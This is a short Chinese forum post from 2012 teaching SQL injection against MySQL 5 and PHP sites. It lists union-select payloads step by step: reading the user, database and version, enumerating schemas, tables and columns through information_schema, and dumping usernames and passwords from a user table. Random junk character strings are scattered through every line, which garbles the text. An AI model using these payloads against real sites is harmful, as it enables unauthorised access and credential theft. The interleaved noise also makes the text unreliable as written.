) ^0 J* D n; x! f \0 O! h! d$ b- f
教程内容:Mysql 5+php 注入- p: x( d2 F! R' h% g( M
% a% ~( {% C- i
1 z6 D' F: Q/ G( V6 u `
# Y( H' p8 R1 Q$ `, Q/ ]3 n一.查看MYSQL基本信息(库名,版本,用户)
5 K+ s9 @, ]4 E- j4 d
8 o; @2 L8 }; P( x5 O6 N0 uand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/* C# g6 O# y* W
9 w; ^4 Q, F; B) ~+ w1 e( W3 E) U$ r. L二.查数据库
; m5 X' c5 `& B9 u0 n& }: y# E
8 g, S# S7 i: v9 |1 V' |1 `and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
* `- q) h i) ^8 slimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。% r( n9 q1 y: {6 {" x0 p
% W0 z U2 |- H! t3 M- E- ~三.暴表6 K; F+ P3 L# s; G& J
9 E. J. o, N; {- Gand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*0 x& T4 d# f* H* a
- f. O- f$ M+ z" x. z
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
/ |5 z- O2 W& X7 q# [2 H( o- `/ `8 Y
四.暴字段' v4 R- Q( U1 y; c, L$ V
% ~# U9 y. Z, ~" O& @and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*2 j3 h% l1 [" ?) }
1 s3 [9 h9 R: h5 q1 U
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。8 [& a% x3 L8 B9 a# L. O: ]7 x+ {; v
$ d) V6 C4 ?/ M3 \" p
五.暴数据9 M+ B& x9 G2 o% p( M9 C; N9 y2 g' K8 {* H
0 z* z- A4 i/ s
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*/ N q# u0 L9 V }# [1 e R- M
9 X; M1 W% u% m U* D
: G p5 O6 o1 M$ v7 Z/ R) ~/ ]这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。" c. D( p0 r+ v9 @( m% n4 \ K3 Z
|
发表于 2012-9-13 16:27:53
收藏
支持
反对